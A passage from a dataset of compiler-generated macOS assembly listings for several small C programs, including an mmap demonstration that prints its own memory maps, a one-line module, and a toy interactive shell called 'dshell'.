bl ___stack_chk_fail
LBB1_15:
mov w0, #0
add sp, sp, #1200
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
ldp x28, x27, [sp], #32 ; 16-byte Folded Reload
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "%c%c%c%c%c%c%c%c"
l_.str.1: ; @.str.1
.asciz "cat /proc/%u/maps"
l_.str.2: ; @.str.2
.asciz "/tmp/foobar"
l___func__.main: ; @__func__.main
.asciz "main"
l_.str.3: ; @.str.3
.asciz "675337.c"
l_.str.4: ; @.str.4
.asciz "map1 != MAP_FAILED"
l_.str.5: ; @.str.5
.asciz "map2 != MAP_FAILED"
l_.str.6: ; @.str.6
.asciz "map3 != MAP_FAILED"
l_.str.7: ; @.str.7
.asciz "on \303\251crit \"1111\" au d\303\251but du mmap1\n"
l_.str.8: ; @.str.8
.asciz "1111"
l_.str.9: ; @.str.9
.asciz "on \303\251crit \"2222\" plus loin dans mmap2\n"
l_.str.10: ; @.str.10
.asciz "2222"
l_.str.11: ; @.str.11
.asciz "map1 contient: \""
l_.str.12: ; @.str.12
.asciz "\"\n"
l_.str.13: ; @.str.13
.asciz "map2 contient: \""
l_.str.14: ; @.str.14
.asciz "map3 contient: \""
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _show ## -- Begin function show
.p2align 4, 0x90
_show: ## @show
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -8(%rbp)
movq -8(%rbp), %rax
movsbl (%rax), %esi
movq -8(%rbp), %rax
movsbl 1(%rax), %edx
movq -8(%rbp), %rax
movsbl 2(%rax), %ecx
movq -8(%rbp), %rax
movsbl 3(%rax), %r8d
movq -8(%rbp), %rax
movsbl 4(%rax), %r9d
movq -8(%rbp), %rax
movsbl 5(%rax), %r11d
movq -8(%rbp), %rax
movsbl 6(%rax), %r10d
movq -8(%rbp), %rax
movsbl 7(%rax), %eax
leaq L_.str(%rip), %rdi
movl %r11d, (%rsp)
movl %r10d, 8(%rsp)
movl %eax, 16(%rsp)
movb $0, %al
callq _printf
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $1168, %rsp ## imm = 0x490
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $0, -1108(%rbp)
movl %edi, -1112(%rbp)
movq %rsi, -1120(%rbp)
leaq -1104(%rbp), %rax
movq %rax, -1160(%rbp) ## 8-byte Spill
callq _getpid
movq -1160(%rbp), %rdi ## 8-byte Reload
movl %eax, %r8d
xorl %esi, %esi
movl $64, %edx
leaq L_.str.1(%rip), %rcx
movb $0, %al
callq ___sprintf_chk
leaq L_.str.2(%rip), %rdi
movl $514, %esi ## imm = 0x202
movb $0, %al
callq _open
movl %eax, -1124(%rbp)
leaq -1040(%rbp), %rdi
movl $48, %esi
movl $1024, %edx ## imm = 0x400
callq _memset
movl $0, -1128(%rbp)
LBB1_1: ## =>This Inner Loop Header: Depth=1
movl -1128(%rbp), %eax
## kill: def $rax killed $eax
cmpq $8, %rax
jae LBB1_4
## %bb.2: ## in Loop: Header=BB1_1 Depth=1
movl -1124(%rbp), %edi
leaq -1040(%rbp), %rsi
movl $1024, %edx ## imm = 0x400
callq _write
## %bb.3: ## in Loop: Header=BB1_1 Depth=1
movl -1128(%rbp), %eax
addl $1, %eax
movl %eax, -1128(%rbp)
jmp LBB1_1
LBB1_4:
leaq -1104(%rbp), %rdi
callq _system
movl -1124(%rbp), %r8d
xorl %eax, %eax
movl %eax, %r9d
movl $8192, %esi ## imm = 0x2000
movl $3, %edx
movl $1, %ecx
movq %r9, %rdi
callq _mmap
movq %rax, -1136(%rbp)
movq $-1, %rax
cmpq %rax, -1136(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB1_6
## %bb.5:
leaq L___func__.main(%rip), %rdi
leaq L_.str.3(%rip), %rsi
leaq L_.str.4(%rip), %rcx
movl $36, %edx
callq ___assert_rtn
LBB1_6:
jmp LBB1_7
LBB1_7:
movl -1124(%rbp), %r8d
xorl %eax, %eax
movl %eax, %r9d
movl $8192, %esi ## imm = 0x2000
movl $3, %edx
movl $1, %ecx
movq %r9, %rdi
callq _mmap
movq %rax, -1144(%rbp)
movq $-1, %rax
cmpq %rax, -1144(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB1_9
## %bb.8:
leaq L___func__.main(%rip), %rdi
leaq L_.str.3(%rip), %rsi
leaq L_.str.5(%rip), %rcx
movl $38, %edx
callq ___assert_rtn
LBB1_9:
jmp LBB1_10
LBB1_10:
movl -1124(%rbp), %r8d
xorl %eax, %eax
movl %eax, %r9d
movl $8192, %esi ## imm = 0x2000
movl $3, %edx
movl $1, %ecx
movq %r9, %rdi
callq _mmap
movq %rax, -1152(%rbp)
movq $-1, %rax
cmpq %rax, -1152(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB1_12
## %bb.11:
leaq L___func__.main(%rip), %rdi
leaq L_.str.3(%rip), %rsi
leaq L_.str.6(%rip), %rcx
movl $40, %edx
callq ___assert_rtn
LBB1_12:
jmp LBB1_13
LBB1_13:
leaq -1104(%rbp), %rdi
callq _system
leaq L_.str.2(%rip), %rdi
callq _unlink
leaq -1104(%rbp), %rdi
callq _system
leaq L_.str.7(%rip), %rdi
movb $0, %al
callq _printf
movq -1136(%rbp), %rdi
leaq L_.str.8(%rip), %rsi
movl $4, %edx
movq $-1, %rcx
callq ___memcpy_chk
leaq L_.str.9(%rip), %rdi
movb $0, %al
callq _printf
movq -1144(%rbp), %rdi
addq $4, %rdi
leaq L_.str.10(%rip), %rsi
movl $4, %edx
movq $-1, %rcx
callq ___memcpy_chk
leaq L_.str.11(%rip), %rdi
movb $0, %al
callq _printf
movq -1136(%rbp), %rdi
callq _show
leaq L_.str.12(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.13(%rip), %rdi
movb $0, %al
callq _printf
movq -1144(%rbp), %rdi
callq _show
leaq L_.str.12(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.14(%rip), %rdi
movb $0, %al
callq _printf
movq -1152(%rbp), %rdi
callq _show
leaq L_.str.12(%rip), %rdi
movb $0, %al
callq _printf
movq -1136(%rbp), %rdi
movl $8192, %esi ## imm = 0x2000
callq _munmap
movq -1144(%rbp), %rdi
movl $8192, %esi ## imm = 0x2000
callq _munmap
movq -1152(%rbp), %rdi
movl $8192, %esi ## imm = 0x2000
callq _munmap
movl -1124(%rbp), %edi
callq _close
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB1_15
## %bb.14:
xorl %eax, %eax
addq $1168, %rsp ## imm = 0x490
popq %rbp
retq
LBB1_15:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "%c%c%c%c%c%c%c%c"
L_.str.1: ## @.str.1
.asciz "cat /proc/%u/maps"
L_.str.2: ## @.str.2
.asciz "/tmp/foobar"
L___func__.main: ## @__func__.main
.asciz "main"
L_.str.3: ## @.str.3
.asciz "675337.c"
L_.str.4: ## @.str.4
.asciz "map1 != MAP_FAILED"
L_.str.5: ## @.str.5
.asciz "map2 != MAP_FAILED"
L_.str.6: ## @.str.6
.asciz "map3 != MAP_FAILED"
L_.str.7: ## @.str.7
.asciz "on \303\251crit \"1111\" au d\303\251but du mmap1\n"
L_.str.8: ## @.str.8
.asciz "1111"
L_.str.9: ## @.str.9
.asciz "on \303\251crit \"2222\" plus loin dans mmap2\n"
L_.str.10: ## @.str.10
.asciz "2222"
L_.str.11: ## @.str.11
.asciz "map1 contient: \""
L_.str.12: ## @.str.12
.asciz "\"\n"
L_.str.13: ## @.str.13
.asciz "map2 contient: \""
L_.str.14: ## @.str.14
.asciz "map3 contient: \""
.subsections_via_symbols
| the_stack_data/675337.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
bl _fcall4
subs w8, w0, #10
cset w8, ne
and w0, w8, #0x1
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl $0, -4(%rbp)
movb $0, %al
callq _fcall4
cmpl $10, %eax
sete %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/122014899.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _entry ; -- Begin function entry
.p2align 2
_entry: ; @entry
.cfi_startproc
; %bb.0:
stp x29, x30, [sp, #-16]! ; 16-byte Folded Spill
.cfi_def_cfa_offset 16
mov x29, sp
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
mov w0, #0
ldp x29, x30, [sp], #16 ; 16-byte Folded Reload
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "I am module one!\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _entry ## -- Begin function entry
.p2align 4, 0x90
_entry: ## @entry
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
xorl %eax, %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "I am module one!\n"
.subsections_via_symbols
| the_stack_data/149568.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _func0 ; -- Begin function func0
.p2align 2
_func0: ; @func0
.cfi_startproc
; %bb.0:
stp x29, x30, [sp, #-16]! ; 16-byte Folded Spill
.cfi_def_cfa_offset 16
mov x29, sp
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
mov w0, #0
ldp x29, x30, [sp], #16 ; 16-byte Folded Reload
ret
.cfi_endproc
; -- End function
.globl _func1 ; -- Begin function func1
.p2align 2
_func1: ; @func1
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur w0, [x29, #-4]
ldur w9, [x29, #-4]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
mov w0, #0
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.globl _func2 ; -- Begin function func2
.p2align 2
_func2: ; @func2
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur w0, [x29, #-4]
stur w1, [x29, #-8]
ldur w8, [x29, #-4]
; implicit-def: $x10
mov x10, x8
ldur w9, [x29, #-8]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _printf
mov w0, #0
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
mov w8, #0
str w8, [sp, #12] ; 4-byte Folded Spill
stur wzr, [x29, #-4]
mov w0, #2
str w0, [sp, #8] ; 4-byte Folded Spill
adrp x1, _signal_process@PAGE
add x1, x1, _signal_process@PAGEOFF
bl _signal
; kill: def $x8 killed $xzr
str xzr, [sp, #16]
adrp x8, _func0@PAGE
add x8, x8, _func0@PAGEOFF
str x8, [sp, #16]
ldr x8, [sp, #16]
blr x8
adrp x8, _func1@PAGE
add x8, x8, _func1@PAGEOFF
str x8, [sp, #16]
ldr x8, [sp, #16]
mov w0, #3
blr x8
ldr w0, [sp, #8] ; 4-byte Folded Reload
adrp x8, _func2@PAGE
add x8, x8, _func2@PAGEOFF
str x8, [sp, #16]
ldr x8, [sp, #16]
mov w1, #5
blr x8
bl _read_filename
bl _printwc
bl _captureinput
ldr w0, [sp, #12] ; 4-byte Folded Reload
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _signal_process ; -- Begin function signal_process
.p2align 2
_signal_process: ; @signal_process
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur w0, [x29, #-4]
adrp x0, l_.str.16@PAGE
add x0, x0, l_.str.16@PAGEOFF
bl _printf
bl _abort
.cfi_endproc
; -- End function
.globl _read_filename ; -- Begin function read_filename
.p2align 2
_read_filename: ; @read_filename
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x0, l_.str.3@PAGE
add x0, x0, l_.str.3@PAGEOFF
adrp x1, _filename@GOTPAGE
ldr x1, [x1, _filename@GOTPAGEOFF]
mov x2, #80
bl _readlink
mov x8, x0
stur w8, [x29, #-4]
ldur w8, [x29, #-4]
subs w8, w8, #0
cset w8, lt
tbnz w8, #0, LBB5_2
b LBB5_1
LBB5_1:
ldur w8, [x29, #-4]
subs w8, w8, #80
cset w8, lt
tbnz w8, #0, LBB5_3
b LBB5_2
LBB5_2:
adrp x0, l_.str.4@PAGE
add x0, x0, l_.str.4@PAGEOFF
bl _printf
mov w0, #-1
bl _exit
LBB5_3:
mov x9, sp
adrp x8, _filename@GOTPAGE
ldr x8, [x8, _filename@GOTPAGEOFF]
str x8, [x9]
adrp x0, l_.str.5@PAGE
add x0, x0, l_.str.5@PAGEOFF
bl _printf
mov w0, #0
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.globl _printwc ; -- Begin function printwc
.p2align 2
_printwc: ; @printwc
.cfi_startproc
; %bb.0:
stp x29, x30, [sp, #-16]! ; 16-byte Folded Spill
.cfi_def_cfa_offset 16
mov x29, sp
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x0, l_.str.6@PAGE
add x0, x0, l_.str.6@PAGEOFF
bl _printf
mov w0, #0
ldp x29, x30, [sp], #16 ; 16-byte Folded Reload
ret
.cfi_endproc
; -- End function
.globl _parse_cmd ; -- Begin function parse_cmd
.p2align 2
_parse_cmd: ; @parse_cmd
.cfi_startproc
; %bb.0:
sub sp, sp, #160
.cfi_def_cfa_offset 160
stp x29, x30, [sp, #144] ; 16-byte Folded Spill
add x29, sp, #144
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
str x0, [sp, #64]
sub x0, x29, #64
mov w1, #0
mov x2, #56
bl _memset
ldr x0, [sp, #64]
bl _strlen
mov x8, x0
str w8, [sp, #48]
str wzr, [sp, #52]
b LBB7_1
LBB7_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #52]
ldr w9, [sp, #48]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB7_6
b LBB7_2
LBB7_2: ; in Loop: Header=BB7_1 Depth=1
ldr x8, [sp, #64]
ldrsw x9, [sp, #52]
ldrsb w8, [x8, x9]
subs w8, w8, #32
cset w8, ne
tbnz w8, #0, LBB7_4
b LBB7_3
LBB7_3:
ldr x1, [sp, #64]
ldrsw x2, [sp, #52]
sub x0, x29, #64
mov x3, #56
bl ___memcpy_chk
b LBB7_6
LBB7_4: ; in Loop: Header=BB7_1 Depth=1
b LBB7_5
LBB7_5: ; in Loop: Header=BB7_1 Depth=1
ldr w8, [sp, #52]
add w8, w8, #1
str w8, [sp, #52]
b LBB7_1
LBB7_6:
ldr w8, [sp, #52]
add w8, w8, #1
str w8, [sp, #60]
str wzr, [sp, #44]
str xzr, [sp, #72]
ldr w8, [sp, #60]
str w8, [sp, #52]
b LBB7_7
LBB7_7: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #52]
ldr w9, [sp, #48]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB7_12
b LBB7_8
LBB7_8: ; in Loop: Header=BB7_7 Depth=1
ldr x8, [sp, #64]
ldrsw x9, [sp, #52]
ldrsb w8, [x8, x9]
subs w8, w8, #44
cset w8, ne
tbnz w8, #0, LBB7_10
b LBB7_9
LBB7_9: ; in Loop: Header=BB7_7 Depth=1
ldr w9, [sp, #52]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.7@PAGE
add x0, x0, l_.str.7@PAGEOFF
bl _printf
ldr x8, [sp, #64]
ldrsw x9, [sp, #60]
add x1, x8, x9
ldr w8, [sp, #52]
ldr w9, [sp, #60]
subs w9, w8, w9
; implicit-def: $x8
mov x8, x9
sxtw x2, w8
add x0, sp, #72
str x0, [sp, #32] ; 8-byte Folded Spill
mov x3, #8
bl ___memcpy_chk
ldr x8, [sp, #32] ; 8-byte Folded Reload
mov x9, sp
str x8, [x9]
adrp x0, l_.str.8@PAGE
add x0, x0, l_.str.8@PAGEOFF
bl _printf
ldr x0, [sp, #32] ; 8-byte Folded Reload
mov x1, #0
mov w2, #0
bl _strtol
sub x8, x29, #64
add x9, x8, #20
ldrsw x10, [sp, #44]
mov x8, x0
str w8, [x9, x10, lsl #2]
ldr w8, [sp, #52]
add w8, w8, #1
str w8, [sp, #60]
ldr w8, [sp, #44]
add w8, w8, #1
str w8, [sp, #44]
b LBB7_11
LBB7_10: ; in Loop: Header=BB7_7 Depth=1
b LBB7_11
LBB7_11: ; in Loop: Header=BB7_7 Depth=1
ldr w8, [sp, #52]
add w8, w8, #1
str w8, [sp, #52]
b LBB7_7
LBB7_12:
ldr w9, [sp, #52]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.7@PAGE
add x0, x0, l_.str.7@PAGEOFF
bl _printf
ldr x8, [sp, #64]
ldrsw x9, [sp, #60]
add x1, x8, x9
ldr w8, [sp, #48]
ldr w9, [sp, #60]
subs w9, w8, w9
; implicit-def: $x8
mov x8, x9
sxtw x2, w8
add x0, sp, #72
str x0, [sp, #16] ; 8-byte Folded Spill
mov x3, #8
bl ___memcpy_chk
ldr x8, [sp, #16] ; 8-byte Folded Reload
mov x9, sp
str x8, [x9]
adrp x0, l_.str.8@PAGE
add x0, x0, l_.str.8@PAGEOFF
bl _printf
ldr x0, [sp, #16] ; 8-byte Folded Reload
mov x1, #0
mov w2, #0
bl _strtol
sub x8, x29, #64
str x8, [sp, #24] ; 8-byte Folded Spill
add x9, x8, #20
ldrsw x10, [sp, #44]
mov x8, x0
str w8, [x9, x10, lsl #2]
ldr w8, [sp, #44]
add w8, w8, #1
str w8, [sp, #44]
ldr w9, [sp, #44]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.9@PAGE
add x0, x0, l_.str.9@PAGEOFF
bl _printf
ldr x8, [sp, #24] ; 8-byte Folded Reload
mov x9, sp
str x8, [x9]
adrp x0, l_.str.10@PAGE
add x0, x0, l_.str.10@PAGEOFF
bl _printf
str wzr, [sp, #52]
b LBB7_13
LBB7_13: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #52]
subs w8, w8, #9
cset w8, ge
tbnz w8, #0, LBB7_16
b LBB7_14
LBB7_14: ; in Loop: Header=BB7_13 Depth=1
ldr w8, [sp, #52]
; implicit-def: $x10
mov x10, x8
sub x8, x29, #64
add x8, x8, #20
ldrsw x9, [sp, #52]
ldr w9, [x8, x9, lsl #2]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x0, l_.str.11@PAGE
add x0, x0, l_.str.11@PAGEOFF
bl _printf
b LBB7_15
LBB7_15: ; in Loop: Header=BB7_13 Depth=1
ldr w8, [sp, #52]
add w8, w8, #1
str w8, [sp, #52]
b LBB7_13
LBB7_16:
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB7_18
b LBB7_17
LBB7_17:
bl ___stack_chk_fail
LBB7_18:
mov w0, #0
ldp x29, x30, [sp, #144] ; 16-byte Folded Reload
add sp, sp, #160
ret
.cfi_endproc
; -- End function
.globl _do_exection ; -- Begin function do_exection
.p2align 2
_do_exection: ; @do_exection
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
ldur x0, [x29, #-8]
adrp x1, l_.str.12@PAGE
add x1, x1, l_.str.12@PAGEOFF
bl _strcmp
subs w8, w0, #0
cset w8, eq
tbnz w8, #0, LBB8_2
b LBB8_1
LBB8_1:
ldur x0, [x29, #-8]
adrp x1, l_.str.13@PAGE
add x1, x1, l_.str.13@PAGEOFF
bl _strcmp
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB8_3
b LBB8_2
LBB8_2:
adrp x0, l_.str.14@PAGE
add x0, x0, l_.str.14@PAGEOFF
bl _printf
mov w0, #0
bl _exit
LBB8_3:
ldur x8, [x29, #-8]
str x8, [sp, #16] ; 8-byte Folded Spill
ldur x0, [x29, #-8]
bl _strlen
ldr x9, [sp, #16] ; 8-byte Folded Reload
mov x8, sp
str x9, [x8]
str x0, [x8, #8]
adrp x0, l_.str.15@PAGE
add x0, x0, l_.str.15@PAGEOFF
bl _printf
ldur x0, [x29, #-8]
bl _parse_cmd
b LBB8_4
LBB8_4:
mov w0, #0
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _readinput ; -- Begin function readinput
.p2align 2
_readinput: ; @readinput
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
str x0, [sp, #8]
str wzr, [sp, #4]
b LBB9_1
LBB9_1: ; =>This Inner Loop Header: Depth=1
bl _getchar
strb w0, [sp, #3]
sxtb w8, w0
subs w8, w8, #10
cset w8, eq
tbnz w8, #0, LBB9_3
b LBB9_2
LBB9_2: ; in Loop: Header=BB9_1 Depth=1
ldrb w8, [sp, #3]
ldr x9, [sp, #8]
ldrsw x10, [sp, #4]
add x9, x9, x10
strb w8, [x9]
ldr w8, [sp, #4]
add w8, w8, #1
str w8, [sp, #4]
b LBB9_1
LBB9_3:
ldr x8, [sp, #8]
ldrsw x9, [sp, #4]
add x8, x8, x9
strb wzr, [x8]
mov w0, #0
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.globl _captureinput ; -- Begin function captureinput
.p2align 2
_captureinput: ; @captureinput
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x0, _inputbuff@GOTPAGE
ldr x0, [x0, _inputbuff@GOTPAGEOFF]
str x0, [sp] ; 8-byte Folded Spill
mov w1, #0
mov x2, #80
bl _memset
b LBB10_1
LBB10_1: ; =>This Inner Loop Header: Depth=1
adrp x0, l_.str.17@PAGE
add x0, x0, l_.str.17@PAGEOFF
bl _printf
ldr x0, [sp] ; 8-byte Folded Reload
bl _readinput
ldr x0, [sp] ; 8-byte Folded Reload
bl _do_exection
b LBB10_1
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "func0 called\n"
l_.str.1: ; @.str.1
.asciz "func1 called para1 %d\n"
l_.str.2: ; @.str.2
.asciz "func2 called para1 %d,para2 %d\n"
l_.str.3: ; @.str.3
.asciz "/proc/self/exe"
.comm _filename,80,0 ; @filename
l_.str.4: ; @.str.4
.asciz "***Error***\n"
l_.str.5: ; @.str.5
.asciz "current absolute path:%s\n"
l_.str.6: ; @.str.6
.asciz "welcome to dshell\n"
l_.str.7: ; @.str.7
.asciz "i = %d\n"
l_.str.8: ; @.str.8
.asciz "buff %s\n"
l_.str.9: ; @.str.9
.asciz "valid arg number %d\n"
l_.str.10: ; @.str.10
.asciz "commmand %s \n"
l_.str.11: ; @.str.11
.asciz "arg[%d] %d \n"
l_.str.12: ; @.str.12
.asciz "quit"
l_.str.13: ; @.str.13
.asciz "exit"
l_.str.14: ; @.str.14
.asciz "quit dshell\n"
l_.str.15: ; @.str.15
.asciz "$$ command %s,len %ld\n"
l_.str.16: ; @.str.16
.asciz "dshell abort\n"
.comm _inputbuff,80,0 ; @inputbuff
l_.str.17: ; @.str.17
.asciz "$$ "
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _func0 ## -- Begin function func0
.p2align 4, 0x90
_func0: ## @func0
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
xorl %eax, %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _func1 ## -- Begin function func1
.p2align 4, 0x90
_func1: ## @func1
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl %edi, -4(%rbp)
movl -4(%rbp), %esi
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
xorl %eax, %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _func2 ## -- Begin function func2
.p2align 4, 0x90
_func2: ## @func2
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl %edi, -4(%rbp)
movl %esi, -8(%rbp)
movl -4(%rbp), %esi
movl -8(%rbp), %edx
leaq L_.str.2(%rip), %rdi
movb $0, %al
callq _printf
xorl %eax, %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl $0, -4(%rbp)
movl $2, %edi
leaq _signal_process(%rip), %rsi
callq _signal
movq $0, -16(%rbp)
leaq _func0(%rip), %rax
movq %rax, -16(%rbp)
movb $0, %al
callq *-16(%rbp)
leaq _func1(%rip), %rax
movq %rax, -16(%rbp)
movl $3, %edi
movb $0, %al
callq *-16(%rbp)
leaq _func2(%rip), %rax
movq %rax, -16(%rbp)
movl $2, %edi
